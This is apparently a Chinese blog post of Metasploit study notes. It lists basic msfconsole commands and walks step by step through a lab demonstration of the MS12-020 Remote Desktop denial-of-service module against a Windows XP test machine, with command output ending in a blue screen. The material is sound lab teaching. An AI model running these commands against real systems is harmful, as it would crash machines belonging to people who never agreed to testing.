Metasploit 学习笔记1

1.一些常用指令
msfconsole 打开控制台终端
msfupdate 更新
help [command] e.g. help search 命令使用帮助信息
search 查找可用攻击模块

use … 选择渗透攻击模块
show payloads 查看与该攻击模块相兼容的攻击载荷
set payload … 设置攻击载荷
set target 设置目标
show options 查看需要设置的配置参数
exploit 实施渗透攻击
back 返回上一级

metasploit渗透攻击模块在目录/usr/share/metasploit-framework/modules/exploits

nmap <扫描选项><扫描目标>

作者:BigYellowHsw
来源:CSDN
原文:https://blog.csdn.net/bigyellowhsw/article/details/78482027
版权声明:本文为博主原创文章,转载请附上博文链接!

2.1 MS12-020漏洞利用演示实验
2.1.1 微软关于MS12-020漏洞的安全公告: http://technet.microsoft.com/zh-cn/security/bulletin/ms12-020

2.1.2 实验准备工作

1、该漏洞利用远程桌面的漏洞进行攻击,所以需要靶机xp系统打开远程桌面功能。

2、检查确定渗透测试系统与靶机系统可以互相ping通。

2.1.3 实验步骤 1、渗透测试系统中,在终端输入msfconsole进入msf终端,接着在msf终端中使用search功能搜索ms12-020,发现有两个可用模块:

msf > search ms12-020

Matching Modules

Name Disclosure Date Rank Description


auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal MS12-020 Microsoft Remote Desktop Use-After-Free DoS
auxiliary/scanner/rdp/ms12_020_check normal MS12-020 Microsoft Remote Desktop Checker
2、使用use命令选定要利用的模块:

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids)
3、查看需要填写的参数,这里需要填写靶机ip。

msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name Current Setting Required Description


RHOST yes The target address
RPORT 3389 yes The target port

msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.116.129
RHOST => 192.168.116.129
4、最后输入命令“run”,执行我们的auxiliary攻击模块:

msf auxiliary(ms12_020_maxchannelids) > run

[] 192.168.116.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[
] 192.168.116.129:3389 - 210 bytes sent
[] 192.168.116.129:3389 - Checking RDP status…
[+] 192.168.116.129:3389 seems down
[
] Auxiliary module execution completed
5、靶机系统受到攻击后蓝屏

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值